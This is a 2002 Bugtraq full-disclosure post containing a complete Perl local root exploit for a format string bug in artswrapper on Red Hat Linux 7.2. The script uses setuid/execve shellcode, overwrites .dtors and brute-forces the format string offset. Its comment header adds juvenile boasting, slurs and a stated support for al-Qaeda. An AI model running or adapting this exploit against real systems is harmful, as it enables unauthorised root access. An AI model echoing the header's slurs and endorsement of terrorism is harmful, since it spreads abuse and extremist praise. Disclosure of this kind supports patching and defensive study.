Bugtraq mailing list archives
LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
From: "kanix THE HACKER" <kanix () twinkie com>
Date: Sat Jul 6 15:45:17 2002
Greetings, This is a local exploit for a format string vulnerability in /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma). Sincerely, kanix
#!/usr/bin/perl
########################################################################
#
# fartsy.pl by kanix <kanix () 0xfee1dead net>
# /usr/sbin/artswrapper <local format string exploit>
# Tested on Red Hat Linux release 7.2 (Enigma)
#
# Jul 6, 2002
#
# "the secret to creativity is knowing how to hide your sources."
# - Albert Einstein
#
# commentz, job offerz, flamez, etc. should be directed to my e-mail
# address -- I WILL SCHOOL YOU ALL.
#
# SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
# official supporter of the al-Qaeda Terrorist Network.
#
# BURN, BABY, BURN!!!
#
# I 0xc0ded this for fun and profit... and to get scene whorez. ;>
#
# This code is far from special - my mother could have written it,
# however, that is the extent of my ability.
#
# I can code sploits, but I know nothing of UNC file sharing! I'm
# still very 0x1337. I mean, I can code exploits, that's what makes
# you a hacker!
#
# SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
# there are enuff retardz in the hacker scene already (LIKE ME ;>)!
#
# Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
# security.is, #hackphreak, teleh0r (fame seeking whore like
# me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
# AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
#
# kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
#
# kanix: can some1 pleeze tell me about DNS cache poisoning?
#
########################################################################
$kode =
"\x31\xdb". # xor ebx, ebx
"\xf7\xe3". # mul ebx
"\xb0\x17". # mov al, 0x17
"\xcd\x80". # int 0x80
"\x31\xc0". # xor eax, eax
"\x99". # cdq
"\x52". # push edx
"\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f
"\x89\xe3". # mov ebx, esp
"\x52". # push edx
"\x53". # push ebx
"\x89\xe1". # mov ecx, esp
"\xb0\x0b". # mov al, 0x0b
"\xcd\x80"; # int 0x80
$vuln = "/usr/bin/artswrapper";
$dtors = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)
printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");
$ret_addr = 0xc0000000 - 4
- (length($vuln) + 1)
- (length($kode) + 1)
;
undef(%ENV); $ENV{'1337'} = $kode;
printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);
for (1 .. 300) {
$fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
die("\x0a") if (system("$vuln -a $fmt_str"))
=~ m/^(0|256|512|32512)$/;
}
sub
sw_fmtstr_create ($$$)
{
die("Incorrect number of arguments for sw_fmtstr_create")
unless @_ == 3;
my ($dest_addr, $ret_addr, $dist) = @_;
my ($word, $qword) = (2, 8);
$tmp1 = (($ret_addr >> 16) & 0xffff);
$tmp2 = $ret_addr & 0xffff;
if ($tmp1 < $tmp2) {
$high = $tmp1 - $qword;
$low = $tmp2 - $high - $qword;
$dest_addr1 = pack('L', $dest_addr + $word);
$dest_addr2 = pack('L', $dest_addr);
}
else {
$high = $tmp2 - $qword;
$low = $tmp1 - $high - $qword;
$dest_addr1 = pack('L', $dest_addr);
$dest_addr2 = pack('L', $dest_addr + $word);
}
sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
$dest_addr1, $dest_addr2, $high, $dist,
$low, $dist + 1);
}
Current thread:
- LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT kanix THE HACKER (Jul 07)